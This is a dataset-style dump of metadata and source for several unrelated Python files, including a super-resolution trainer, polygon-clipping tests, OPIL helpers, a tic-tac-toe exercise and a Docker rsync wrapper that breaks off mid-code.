hexsha stringlengths 40 40 | size int64 5 2.06M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 248 | max_stars_repo_name stringlengths 5 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 248 | max_issues_repo_name stringlengths 5 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 248 | max_forks_repo_name stringlengths 5 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 5 2.06M | avg_line_length float64 1 1.02M | max_line_length int64 3 1.03M | alphanum_fraction float64 0 1 | count_classes int64 0 1.6M | score_classes float64 0 1 | count_generators int64 0 651k | score_generators float64 0 1 | count_decorators int64 0 990k | score_decorators float64 0 1 | count_async_functions int64 0 235k | score_async_functions float64 0 1 | count_documentation int64 0 1.04M | score_documentation float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
25c80db82d1ebad170680349cd93672e15412051 | 1,342 | py | Python | code/src/main.py | ChaofWang/AWSRN | b7e285e73667e114ccb69e354254c4f67ca39e25 | [
"MIT"
] | 162 | 2019-04-05T02:05:45.000Z | 2022-01-15T02:16:59.000Z | code/src/main.py | ChaofWang/AWSRN | b7e285e73667e114ccb69e354254c4f67ca39e25 | [
"MIT"
] | 16 | 2019-05-11T15:38:25.000Z | 2020-08-12T13:15:45.000Z | code/src/main.py | ChaofWang/AWSRN | b7e285e73667e114ccb69e354254c4f67ca39e25 | [
"MIT"
] | 22 | 2019-04-20T14:37:51.000Z | 2022-03-21T05:58:17.000Z | import torch
import utility
import data
import model
import loss
from option import args
from trainer import Trainer
def print_network(net):
num_params = 0
for param in net.parameters():
num_params += param.numel()
print(net)
print('Total number of parameters: %d' % num_params)
def print_setting(net, args):
print('init this train:')
print_network(net)
print('training model:', args.model)
print('scale:', args.scale)
print('resume from ', args.resume)
print('output patch size', args.patch_size)
print('model setting: n_resblocks:', args.n_resblocks,
'n_feats:', args.n_feats, 'block_feats:', args.block_feats)
print('optimization setting: ', args.optimizer)
print('total epochs:', args.epochs)
print('lr:', args.lr, 'lr_decay at:', args.decay_type, 'decay gamma:', args.gamma)
print('train loss:', args.loss)
print('save_name:', args.save)
torch.manual_seed(args.seed)
checkpoint = utility.checkpoint(args)
if checkpoint.ok:
loader = data.Data(args)
model = model.Model(args, checkpoint)
print_setting(model, args)
loss = loss.Loss(args, checkpoint) if not args.test_only else None
t = Trainer(args, loader, model, loss, checkpoint)
while not t.terminate():
t.train()
t.test()
checkpoint.done()
| 27.958333 | 87 | 0.671386 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 258 | 0.19225 |
25c81eb343b1d3a48857d65ac0f1c63ee02f3d87 | 710 | py | Python | mycroft/views.py | seakers/daphne-brain | 1d703d468cd503a21395f986dd72e67b6e556451 | [
"MIT"
] | null | null | null | mycroft/views.py | seakers/daphne-brain | 1d703d468cd503a21395f986dd72e67b6e556451 | [
"MIT"
] | null | null | null | mycroft/views.py | seakers/daphne-brain | 1d703d468cd503a21395f986dd72e67b6e556451 | [
"MIT"
] | null | null | null | from rest_framework.views import APIView
from rest_framework.response import Response
from auth_API.helpers import get_or_create_user_information
class CheckConnection(APIView):
def post(self, request, format=None):
# --> 1. Get connection status and id
user_info = get_or_create_user_information(request.session, request.user, 'EOSS')
conn_status = user_info.mycroft_connection
conn_id = user_info.mycroft_session
print('--> CHECKING MYCROFT CONNECTIONS:', conn_id, conn_status)
if conn_status is False:
return Response({"connection": "false", "access_token": conn_id})
else:
return Response({"connection": "true"})
| 29.583333 | 89 | 0.7 | 557 | 0.784507 | 0 | 0 | 0 | 0 | 0 | 0 | 129 | 0.18169 |
25c905966ddc0f0df2e0e38de7498ec35dea8707 | 2,295 | py | Python | examples/machine_learning.py | miroslavftn/Text-classification | 3fa627606fdd5fbfde5ec118441fd24088ad7137 | [
"Apache-2.0"
] | 2 | 2019-05-17T02:39:12.000Z | 2020-07-15T09:35:04.000Z | examples/machine_learning.py | miroslavftn/Text-classification | 3fa627606fdd5fbfde5ec118441fd24088ad7137 | [
"Apache-2.0"
] | null | null | null | examples/machine_learning.py | miroslavftn/Text-classification | 3fa627606fdd5fbfde5ec118441fd24088ad7137 | [
"Apache-2.0"
] | null | null | null |
from models.statistical.ml_classifier import MLClassifier
from models.statistical.models import ModelsFactory
from models.statistical.tokenizer import TokenizerFactory
# can be loaded from a config file
model_name = 'xgb'
tokenizer_name = 'default'
ngrams = 2
name = 'sst2'
stopwords = False
max_features = 5000
test_size = 0.2
model = ModelsFactory.from_name(model_name) # init model
tokenizer = TokenizerFactory.from_name(tokenizer_name) # init tokenizer
def predict_ml_classifier(text, plot=False):
"""
Predict label from input text
:param text: input text
:param plot: show important words
:return: predicted value
"""
ml_classifier = MLClassifier(input_data=None,
output_data=None,
model=model,
tokenizer=tokenizer,
stop_words=stopwords,
ngram=ngrams,
max_features=max_features,
test_size=test_size,
name=name)
return ml_classifier.predict([text], plot=plot)[0]
def train_ml_classifier(input_data, output_data):
"""
Train a classifier
:param input_data: input documents
:param output_data: labels
:return:
"""
ml_classifier = MLClassifier(input_data=input_data,
output_data=output_data,
model=model,
tokenizer=tokenizer,
stop_words=stopwords,
ngram=ngrams,
max_features=max_features,
test_size=test_size,
name=name)
ml_classifier.train(resampling=False)
if __name__ == '__main__':
import pandas as pd
from configs import SST2_DIR
df = pd.read_csv(SST2_DIR + '/train.tsv', delimiter='\t')
input_data = df['sentence']
output_data = df['label']
print('Training ML classifier')
train_ml_classifier(input_data, output_data) | 34.253731 | 72 | 0.533769 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 416 | 0.181264 |
25cbeb75700cfc7ba35658909719975df140adca | 6,215 | py | Python | tests/test_algorithms/test_sutherland_hodgman.py | Huite/numba_celltree | f6562153fb09468c64c6594b5ed4c48ce827997a | [
"MIT"
] | 2 | 2021-08-30T08:44:45.000Z | 2021-08-30T11:55:25.000Z | tests/test_algorithms/test_sutherland_hodgman.py | Deltares/numba_celltree | 898c54a18731e56407d03636f7f18e67d84a1f00 | [
"MIT"
] | null | null | null | tests/test_algorithms/test_sutherland_hodgman.py | Deltares/numba_celltree | 898c54a18731e56407d03636f7f18e67d84a1f00 | [
"MIT"
] | null | null | null | """"
Test data generated with:
```python
import numpy as np
import shapely.geometry as sg
def ccw(a):
# Ensure triangles are counter-clockwise
for i in range(len(a)):
t = a[i]
normal = (t[1][0] - t[0][0])*(t[2][1]-t[0][1])-(t[1][1]-t[0][1])*(t[2][0]-t[0][0])
if normal < 0:
a[i] = t[::-1]
def area_of_intersection(a, b):
ntriangles = a.shape[0]
out = np.empty(ntriangles, dtype=np.float64)
for i in range(ntriangles):
aa = sg.Polygon(a[i])
bb = sg.Polygon(b[i])
out[i] = aa.intersection(bb).area
return out
a = np.random.rand(10, 3, 2)
b = np.random.rand(10, 3, 2)
ccw(a)
ccw(b)
expected = area_of_intersection(a, b)
```
"""
import numpy as np
from numba_celltree.algorithms.sutherland_hodgman import (
area_of_intersection,
box_area_of_intersection,
intersection,
polygon_polygon_clip_area,
)
from numba_celltree.constants import FloatDType, Point, Vector
A = np.array(
[
[[0.98599114, 0.16203056], [0.64839124, 0.6552714], [0.44528724, 0.88567472]],
[[0.96182162, 0.3642742], [0.03478739, 0.54268026], [0.57582971, 0.41541277]],
[[0.32556365, 0.03800701], [0.74000686, 0.04684465], [0.89527188, 0.55061165]],
[[0.2988294, 0.96608896], [0.01212383, 0.00144037], [0.75113002, 0.54797261]],
[[0.06522962, 0.43735202], [0.791499, 0.5229509], [0.40651803, 0.94317979]],
[[0.06544202, 0.16735701], [0.67916353, 0.95843272], [0.33545733, 0.86368003]],
[[0.43129575, 0.27998206], [0.49468229, 0.75438255], [0.01542992, 0.80696797]],
[[0.29449023, 0.32433138], [0.46157048, 0.22492393], [0.82442969, 0.75853821]],
[[0.66113797, 0.88485505], [0.70164374, 0.24393423], [0.89565423, 0.89407158]],
[[0.92226655, 0.82771688], [0.42243438, 0.17562404], [0.82885357, 0.17541439]],
],
)
B = np.array(
[
[[0.8141854, 0.06821897], [0.37086004, 0.49067617], [0.79810508, 0.07873283]],
[[0.74948185, 0.8942076], [0.59654411, 0.87755533], [0.3023107, 0.68256513]],
[[0.46670989, 0.31716127], [0.68408985, 0.75792215], [0.41437824, 0.79509823]],
[[0.60715923, 0.67648133], [0.40045464, 0.79676831], [0.06332723, 0.69679141]],
[[0.24057248, 0.16433727], [0.58871277, 0.05499277], [0.59144784, 0.24476056]],
[[0.23183198, 0.41619006], [0.66566902, 0.30110111], [0.60418791, 0.60702136]],
[[0.09393344, 0.87976118], [0.994083, 0.00532686], [0.95176396, 0.79836557]],
[[0.89063751, 0.5880825], [0.03881315, 0.82436939], [0.61391092, 0.45027842]],
[[0.63168954, 0.75135847], [0.8726944, 0.06387274], [0.89585471, 0.92837592]],
[[0.94379596, 0.64164962], [0.95787609, 0.65627618], [0.6212529, 0.89153053]],
]
)
EXPECTED = np.array(
[
0.0,
0.0,
0.0,
0.0262324,
0.0,
0.00038042,
0.03629781,
0.01677156,
0.05417924,
0.00108787,
]
)
def test_intersection():
# Intersection
a = Point(0.0, 0.0)
V = Vector(1.0, 1.0)
r = Point(1.0, 0.0)
s = Point(0.0, 1.0)
U = Vector(s.x - r.x, s.y - r.y)
N = Vector(-U.y, U.x)
succes, p = intersection(a, V, r, N)
assert succes
assert np.allclose(p, [0.5, 0.5])
# Parallel lines, no intersection
s = Point(2.0, 1.0)
U = Vector(s.x - r.x, s.y - r.y)
N = Vector(-U.y, U.x)
succes, p = intersection(a, V, r, N)
assert not succes
def test_clip_area():
for a, b, expected in zip(A, B, EXPECTED):
actual = polygon_polygon_clip_area(a, b)
assert np.allclose(actual, expected)
def test_clip_area_no_overlap():
a = np.array(
[
[0.0, 0.0],
[1.0, 0.0],
[1.0, 1.0],
]
)
b = a.copy()
b += 2.0
actual = polygon_polygon_clip_area(a, b)
assert np.allclose(actual, 0)
def test_clip_area_repeated_vertex():
a = np.array(
[
[0.0, 0.0],
[1.0, 0.0],
[1.0, 0.0],
[1.0, 1.0],
]
)
# No overlap
b = a.copy()
b += 2.0
actual = polygon_polygon_clip_area(a, b)
assert np.allclose(actual, 0)
b = np.array(
[
[0.0, 0.0],
[1.0, 0.0],
[0.0, 1.0],
[0.0, 1.0],
]
)
actual = polygon_polygon_clip_area(a, b)
def test_clip_area_epsilon():
EPS = np.finfo(FloatDType).eps
a = np.array(
[
[-1.0, -1.0],
[1.0, -1.0],
[1.0, 1.0],
]
)
b = np.array(
[
[-1.0 - EPS, -1.0 - EPS],
[1.0 + EPS, -1.0 - EPS],
[1.0 + EPS, 1.0 + EPS],
]
)
actual = polygon_polygon_clip_area(a, b)
assert np.allclose(actual, 2.0)
EPS = -EPS
b = np.array(
[
[-1.0 - EPS, -1.0 - EPS],
[1.0 + EPS, -1.0 - EPS],
[1.0 + EPS, 1.0 + EPS],
]
)
actual = polygon_polygon_clip_area(a, b)
assert np.allclose(actual, 2.0)
def test_area_of_intersection():
vertices_a = A.reshape(-1, 2)
vertices_b = B.reshape(-1, 2)
faces_a = np.arange(len(vertices_a)).reshape(-1, 3)
faces_b = np.arange(len(vertices_b)).reshape(-1, 3)
indices_a = np.arange(len(faces_a))
indices_b = np.arange(len(faces_a))
actual = area_of_intersection(
vertices_a, vertices_b, faces_a, faces_b, indices_a, indices_b
)
assert np.allclose(actual, EXPECTED)
def test_box_area_of_intersection():
box_coords = np.array(
[
[0.0, 1.0, 0.0, 1.0],
[1.0, 2.0, 1.0, 2.0],
]
)
vertices = np.array(
[
[0.0, 0.0],
[2.0, 0.0],
[2.0, 2.0],
[-2.0, 0.0],
[-2.0, 2.0],
]
)
faces = np.array(
[
[0, 1, 2],
[0, 3, 4],
]
)
indices_bbox = np.array([0, 0, 1, 1])
indices_face = np.array([0, 1, 0, 1])
actual = box_area_of_intersection(
box_coords,
vertices,
faces,
indices_bbox,
indices_face,
)
assert np.allclose(actual, [0.5, 0.0, 0.5, 0.0])
| 26.559829 | 90 | 0.524698 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 774 | 0.124537 |
25cd4e9ba282e597a4fa5b69cbe92a7a0be65817 | 155 | py | Python | interpreter/application.py | Jesssullivan/MerlinAI-Interpreters | e2e053f357a74d642b160b42a1276fa44c45614b | [
"Unlicense"
] | 3 | 2019-02-23T03:19:32.000Z | 2020-02-12T13:54:02.000Z | interpreter/application.py | Jesssullivan/MerlinAI-Interpreters | e2e053f357a74d642b160b42a1276fa44c45614b | [
"Unlicense"
] | null | null | null | interpreter/application.py | Jesssullivan/MerlinAI-Interpreters | e2e053f357a74d642b160b42a1276fa44c45614b | [
"Unlicense"
] | null | null | null |
from app.main import create_app
from waitress import serve
if __name__ == "__main__":
app = create_app()
serve(app, host='0.0.0.0', port='5000')
| 19.375 | 43 | 0.677419 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 25 | 0.16129 |
25ce6b3af033822b4efc267bfa22d834752ae174 | 2,575 | py | Python | source/194-Vencedor_do_jogo_da_velha.py | FelixLuciano/DesSoft-2020.2 | a44063d63778329f1e1266881f20f7954ecb528b | [
"MIT"
] | null | null | null | source/194-Vencedor_do_jogo_da_velha.py | FelixLuciano/DesSoft-2020.2 | a44063d63778329f1e1266881f20f7954ecb528b | [
"MIT"
] | null | null | null | source/194-Vencedor_do_jogo_da_velha.py | FelixLuciano/DesSoft-2020.2 | a44063d63778329f1e1266881f20f7954ecb528b | [
"MIT"
] | null | null | null | # Vencedor do jogo da velha
# Faça uma função que recebe um tabuleiro de jogo da velha e devolve o vencedor. O tabuleiro é representado por uma lista de listas como o mostrado a seguir:
# [['X', 'O', 'X'], ['.', 'O', 'X'], ['O', '.', 'X']]
# Note que a lista acima é idêntica a:
# [
# ['X', 'O', 'X'],
# ['.', 'O', 'X'],
# ['O', '.', 'X']
# ]
# Os jogadores são representados pelas letras maiúsculas 'X' e 'O'. Espaços em branco são representados pelo caractere '.'. Para vencer no jogo da velha, um jogador deve marcar todas as casas de uma mesma coluna, linha ou diagonal. No exemplo acima o 'X' é o vencedor, assim a função deve retornar o valor 'X', caso o 'O' seja o vencedor a função deve retornar 'O'. Caso não haja vencedor, a sua função deve retornar 'V'.
# Alguns exemplos:
# - Sua função deve retornar 'O' para as seguintes entradas:
# [
# ['X', 'O', 'O'],
# ['.', 'O', 'X'],
# ['O', '.', 'X']
# ]
# [
# ['X', '.', 'X'],
# ['O', 'O', 'O'],
# ['.', 'O', 'X']
# ]
# - Sua função deve retornar 'V' para o exemplo a seguir:
# [
# ['X', '.', 'X'],
# ['X', 'O', 'O'],
# ['O', 'X', 'O']
# ]
# O nome da sua função deve ser 'verifica_jogo_da_velha'.
def verifica_linha (character, line):
return all([letter == character for letter in line])
def verifica_jogo_da_velha (table):
# Itera cada letra
for character in ("X", "O"):
# Itera linhas do tabuleiro
for line in table:
# Verifica se alguma linha está preenchida somente com uma letra
if verifica_linha(character, line):
return character
# Itera colunas do tabuleiro
for column_i in range(len(table[0])):
# Extrai coluna da tabela
column = [line[column_i] for line in table]
# Verifica se alguma coluna está preenchida somente com uma letra
if verifica_linha(character, column):
return character
# Extrai diagonais da tabela
diagonal_1 = [line[i] for i, line in enumerate(table)]
diagonal_2 = [line[-i-1] for i, line in enumerate(table)]
# Verifica se alguma diagonal está preenchida somente com uma letra
if verifica_linha(character, diagonal_1) or verifica_linha(character, diagonal_2):
return character
# Retorna velha se nenhuma condição for satisfeita
return "V"
# Feedback do professor:
# "Solução muito elegante. Parabéns!"
| 39.015152 | 421 | 0.573204 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,730 | 0.663598 |
25d13fa91e8a27a8e3e83ce1553d500555f00fd0 | 99 | py | Python | src/boat/reservierung/apps.py | holytortoise/boat_project | b318cc46034c8e87cfa2db29fda7b6ea08a7745a | [
"MIT"
] | null | null | null | src/boat/reservierung/apps.py | holytortoise/boat_project | b318cc46034c8e87cfa2db29fda7b6ea08a7745a | [
"MIT"
] | null | null | null | src/boat/reservierung/apps.py | holytortoise/boat_project | b318cc46034c8e87cfa2db29fda7b6ea08a7745a | [
"MIT"
] | null | null | null | from django.apps import AppConfig
class ReservierungConfig(AppConfig):
name = 'reservierung'
| 16.5 | 36 | 0.777778 | 62 | 0.626263 | 0 | 0 | 0 | 0 | 0 | 0 | 14 | 0.141414 |
25d2427f17acf99c0e015181ad76ec8cf75b6f09 | 1,065 | py | Python | src/bst/pygasus/datamanager/grokker.py | codeix/bst.pygasus.datamanager | 3b60cbc0b44814701fcbc8c5558a30002a9a2778 | [
"ZPL-2.1"
] | null | null | null | src/bst/pygasus/datamanager/grokker.py | codeix/bst.pygasus.datamanager | 3b60cbc0b44814701fcbc8c5558a30002a9a2778 | [
"ZPL-2.1"
] | null | null | null | src/bst/pygasus/datamanager/grokker.py | codeix/bst.pygasus.datamanager | 3b60cbc0b44814701fcbc8c5558a30002a9a2778 | [
"ZPL-2.1"
] | null | null | null | import martian
from martian.error import GrokError
from grokcore.component import name as namedirective
from zope import component
from bst.pygasus.datamanager.model import ExtBaseModel
from bst.pygasus.datamanager.interfaces import IModelTransformer
from bst.pygasus.datamanager.transformer import ModelTransfomerUtility
class schema(martian.Directive):
scope = martian.CLASS
store = martian.ONCE
default = None
class ExtModelGrokker(martian.ClassGrokker):
martian.component(ExtBaseModel)
martian.directive(schema)
martian.directive(namedirective)
def execute(self, class_, schema, name, **kw):
if schema is None:
raise GrokError('Class %s is missing directive "schema". Need a Interface\
to create the model.' % class_, class_)
if not name:
name = class_.__name__
gsm = component.getGlobalSiteManager()
transformer = ModelTransfomerUtility(class_, schema)
gsm.registerUtility(transformer, IModelTransformer, name)
return True
| 31.323529 | 86 | 0.721127 | 736 | 0.69108 | 0 | 0 | 0 | 0 | 0 | 0 | 109 | 0.102347 |
25d28a94c243549378bccac5503509c7d698f1cd | 4,833 | py | Python | intent_parser/utils/opil_utils.py | SD2E/experimental-intent-parser | 65aee0ad800777f265210766a9e5eac431e0feaa | [
"BSD-3-Clause"
] | 3 | 2020-07-09T19:52:58.000Z | 2020-08-05T18:05:54.000Z | intent_parser/utils/opil_utils.py | SD2E/experimental-intent-parser | 65aee0ad800777f265210766a9e5eac431e0feaa | [
"BSD-3-Clause"
] | 293 | 2020-06-19T18:51:27.000Z | 2021-09-17T20:42:41.000Z | intent_parser/utils/opil_utils.py | SD2E/experimental-intent-parser | 65aee0ad800777f265210766a9e5eac431e0feaa | [
"BSD-3-Clause"
] | null | null | null | """
Provides a list of functions for building opil objects.
"""
from intent_parser.intent.measure_property_intent import MeasuredUnit
from intent_parser.intent_parser_exceptions import IntentParserException
import intent_parser.utils.sbol3_utils as sbol3_utils
import intent_parser.table.cell_parser as cell_parser
import intent_parser.constants.intent_parser_constants as ip_constants
import opil
import tyto
def create_opil_boolean_parameter_value(value: bool):
parameter_value = opil.BooleanValue()
parameter_value.value = value
return parameter_value
def create_opil_enumerated_parameter_value(value: str):
parameter_value = opil.EnumeratedValue()
parameter_value.value = value
return parameter_value
def create_opil_integer_parameter_value(value: int):
parameter_value = opil.IntegerValue()
parameter_value.value = value
return parameter_value
def create_opil_measurement_parameter_value(value: float, unit=''):
parameter_value = opil.MeasureValue()
measure = MeasuredUnit(value, unit)
parameter_value.has_measure = measure.to_opil_measure()
return parameter_value
def create_opil_string_parameter_value(value: str):
parameter_value = opil.StringValue()
parameter_value.value = value
return parameter_value
def create_opil_URI_parameter_value(value: str):
parameter_value = opil.URIValue()
parameter_value.value = value
return parameter_value
def create_parameter_value_from_parameter(opil_parameter, parameter_value):
if isinstance(opil_parameter, opil.BooleanParameter):
return create_opil_boolean_parameter_value(bool(parameter_value))
elif isinstance(opil_parameter, opil.EnumeratedParameter):
return create_opil_enumerated_parameter_value(str(parameter_value))
elif isinstance(opil_parameter, opil.IntegerParameter):
return create_opil_integer_parameter_value(int(parameter_value))
elif isinstance(opil_parameter, opil.MeasureParameter):
if cell_parser.PARSER.is_number(str(parameter_value)):
return create_opil_measurement_parameter_value(parameter_value, tyto.OM.number)
possible_units = list(ip_constants.FLUID_UNIT_MAP.keys()) + list(ip_constants.TIME_UNIT_MAP.keys())
measured_units = cell_parser.PARSER.process_values_unit(parameter_value,
units=possible_units,
unit_type='fluid')
if len(measured_units) != 1:
raise IntentParserException('Expecting one Measurement Parameter value but %d were found.' % len(measured_units))
return create_opil_measurement_parameter_value(float(measured_units[0].get_value()),
measured_units[0].get_unit())
elif isinstance(opil_parameter, opil.StringParameter):
return create_opil_string_parameter_value(str(parameter_value))
elif isinstance(opil_parameter, opil.URIParameter):
return create_opil_URI_parameter_value(str(parameter_value))
def get_param_value_as_string(parameter_value):
if type(parameter_value) is opil.BooleanValue:
return str(parameter_value.value)
elif type(parameter_value) is opil.EnumeratedValue:
return str(parameter_value.value)
elif type(parameter_value) is opil.IntegerValue:
return str(parameter_value.value)
elif type(parameter_value) is opil.MeasureValue:
if parameter_value.has_measure:
measure_number = float(parameter_value.has_measure.value)
measure_unit = sbol3_utils.get_unit_name_from_uri(parameter_value.has_measure.unit)
if measure_unit:
if measure_unit == tyto.OM.number:
return str(measure_number)
else:
return str(measure_number) + ' ' + measure_unit
return str(measure_number)
elif type(parameter_value) is opil.StringValue:
return parameter_value.value if parameter_value.value else ' '
elif type(parameter_value) is opil.URIValue:
return str(parameter_value.value)
elif isinstance(parameter_value, str):
return parameter_value
return ''
def fix_nonunique_parameter_names(doc):
# Collect all objects in Document
all_objects = doc.find_all(lambda obj: True if obj.name else False)
# Gather objects with non-unique names
name_map = {o.name: [] for o in all_objects if o.name}
for o in all_objects:
name_map[o.name].append(o)
# Rename using name + description + display_id
for name, nonuniquely_named_objects in name_map.items():
if len(nonuniquely_named_objects) > 1:
for o in nonuniquely_named_objects:
o.name = f'{o.name} ({o.description})({o.display_id})'
| 43.540541 | 125 | 0.723774 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 304 | 0.062901 |
25d3f23269643ac6a6edc73c74d7612fd5227b4e | 6,741 | py | Python | ooobuild/lo/ucb/x_simple_file_access.py | Amourspirit/ooo_uno_tmpl | 64e0c86fd68f24794acc22d63d8d32ae05dd12b8 | [
"Apache-2.0"
] | null | null | null | ooobuild/lo/ucb/x_simple_file_access.py | Amourspirit/ooo_uno_tmpl | 64e0c86fd68f24794acc22d63d8d32ae05dd12b8 | [
"Apache-2.0"
] | null | null | null | ooobuild/lo/ucb/x_simple_file_access.py | Amourspirit/ooo_uno_tmpl | 64e0c86fd68f24794acc22d63d8d32ae05dd12b8 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
#
# Copyright 2022 :Barry-Thomas-Paul: Moss
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http: // www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Interface Class
# this is a auto generated file generated by Cheetah
# Libre Office Version: 7.3
# Namespace: com.sun.star.ucb
import typing
from abc import abstractmethod
from ..uno.x_interface import XInterface as XInterface_8f010a43
if typing.TYPE_CHECKING:
from ..io.x_input_stream import XInputStream as XInputStream_98d40ab4
from ..io.x_output_stream import XOutputStream as XOutputStream_a4e00b35
from ..io.x_stream import XStream as XStream_678908a4
from ..task.x_interaction_handler import XInteractionHandler as XInteractionHandler_bf80e51
from ..util.date_time import DateTime as DateTime_84de09d3
class XSimpleFileAccess(XInterface_8f010a43):
"""
This is the basic interface to read data from a stream.
See Also:
`API XSimpleFileAccess <https://api.libreoffice.org/docs/idl/ref/interfacecom_1_1sun_1_1star_1_1ucb_1_1XSimpleFileAccess.html>`_
"""
__ooo_ns__: str = 'com.sun.star.ucb'
__ooo_full_ns__: str = 'com.sun.star.ucb.XSimpleFileAccess'
__ooo_type_name__: str = 'interface'
__pyunointerface__: str = 'com.sun.star.ucb.XSimpleFileAccess'
@abstractmethod
def copy(self, SourceURL: str, DestURL: str) -> None:
"""
Copies a file.
Raises:
com.sun.star.ucb.CommandAbortedException: ``CommandAbortedException``
com.sun.star.uno.Exception: ``Exception``
"""
@abstractmethod
def createFolder(self, NewFolderURL: str) -> None:
"""
Creates a new Folder.
Raises:
com.sun.star.ucb.CommandAbortedException: ``CommandAbortedException``
com.sun.star.uno.Exception: ``Exception``
"""
@abstractmethod
def exists(self, FileURL: str) -> bool:
"""
Checks if a file exists.
Raises:
com.sun.star.ucb.CommandAbortedException: ``CommandAbortedException``
com.sun.star.uno.Exception: ``Exception``
"""
@abstractmethod
def getContentType(self, FileURL: str) -> str:
"""
Returns the content type of a file.
Raises:
com.sun.star.ucb.CommandAbortedException: ``CommandAbortedException``
com.sun.star.uno.Exception: ``Exception``
"""
@abstractmethod
def getDateTimeModified(self, FileURL: str) -> 'DateTime_84de09d3':
"""
Returns the last modified date for the file.
Raises:
com.sun.star.ucb.CommandAbortedException: ``CommandAbortedException``
com.sun.star.uno.Exception: ``Exception``
"""
@abstractmethod
def getFolderContents(self, FolderURL: str, bIncludeFolders: bool) -> 'typing.Tuple[str, ...]':
"""
Returns the contents of a folder.
Raises:
com.sun.star.ucb.CommandAbortedException: ``CommandAbortedException``
com.sun.star.uno.Exception: ``Exception``
"""
@abstractmethod
def getSize(self, FileURL: str) -> int:
"""
Returns the size of a file.
Raises:
com.sun.star.ucb.CommandAbortedException: ``CommandAbortedException``
com.sun.star.uno.Exception: ``Exception``
"""
@abstractmethod
def isFolder(self, FileURL: str) -> bool:
"""
Checks if a URL represents a folder.
Raises:
com.sun.star.ucb.CommandAbortedException: ``CommandAbortedException``
com.sun.star.uno.Exception: ``Exception``
"""
@abstractmethod
def isReadOnly(self, FileURL: str) -> bool:
"""
Checks if a file is \"read only\".
Raises:
com.sun.star.ucb.CommandAbortedException: ``CommandAbortedException``
com.sun.star.uno.Exception: ``Exception``
"""
@abstractmethod
def kill(self, FileURL: str) -> None:
"""
Removes a file.
If the URL represents a folder, the folder will be removed, even if it's not empty.
Raises:
com.sun.star.ucb.CommandAbortedException: ``CommandAbortedException``
com.sun.star.uno.Exception: ``Exception``
"""
@abstractmethod
def move(self, SourceURL: str, DestURL: str) -> None:
"""
Moves a file.
Raises:
com.sun.star.ucb.CommandAbortedException: ``CommandAbortedException``
com.sun.star.uno.Exception: ``Exception``
"""
@abstractmethod
def openFileRead(self, FileURL: str) -> 'XInputStream_98d40ab4':
"""
Opens file to read.
Raises:
com.sun.star.ucb.CommandAbortedException: ``CommandAbortedException``
com.sun.star.uno.Exception: ``Exception``
"""
@abstractmethod
def openFileReadWrite(self, FileURL: str) -> 'XStream_678908a4':
"""
Opens file to read and write.
Raises:
com.sun.star.ucb.CommandAbortedException: ``CommandAbortedException``
com.sun.star.uno.Exception: ``Exception``
"""
@abstractmethod
def openFileWrite(self, FileURL: str) -> 'XOutputStream_a4e00b35':
"""
Opens file to write.
Raises:
com.sun.star.ucb.CommandAbortedException: ``CommandAbortedException``
com.sun.star.uno.Exception: ``Exception``
"""
@abstractmethod
def setInteractionHandler(self, Handler: 'XInteractionHandler_bf80e51') -> None:
"""
Sets an interaction handler to be used for further operations.
A default interaction handler is available as service com.sun.star.task.InteractionHandler. The documentation of this service also contains further information about the interaction handler concept.
"""
@abstractmethod
def setReadOnly(self, FileURL: str, bReadOnly: bool) -> None:
"""
Sets the \"read only\" of a file according to the boolean parameter, if the actual process has the right to do so.
Raises:
com.sun.star.ucb.CommandAbortedException: ``CommandAbortedException``
com.sun.star.uno.Exception: ``Exception``
"""
__all__ = ['XSimpleFileAccess']
| 35.478947 | 206 | 0.645305 | 5,465 | 0.810711 | 0 | 0 | 4,898 | 0.726598 | 0 | 0 | 4,734 | 0.70227 |
25d52bf609ce8588538ff83d163bae532e4ec465 | 4,063 | py | Python | bin/bb8/docker_rsync.py | vimc/bb8 | ec3ad795cc442f33cc58129ab1d9267dc225f9c5 | [
"MIT"
] | null | null | null | bin/bb8/docker_rsync.py | vimc/bb8 | ec3ad795cc442f33cc58129ab1d9267dc225f9c5 | [
"MIT"
] | 22 | 2018-01-25T12:14:41.000Z | 2020-08-18T13:21:13.000Z | bin/bb8/docker_rsync.py | vimc/bb8 | ec3ad795cc442f33cc58129ab1d9267dc225f9c5 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import logging
from os import getuid, getgid
from os.path import join
import docker
from .logger import log_from_docker
class DockerRsync(object):
def __init__(self, client=docker.from_env()):
self.client = client
def _run_rsync(self, volumes, from_path, to_path, relative):
# Disable ssh compression:
# https://galaxysd.github.io/20160302/Fastest-Way-Rsync
ssh_cmd = "ssh -o Compression=no"
cmd = ["rsync",
# copy directories recursively
"-r",
# verbose - give info about what files are being transferred
# and a brief summary at the end
"-v",
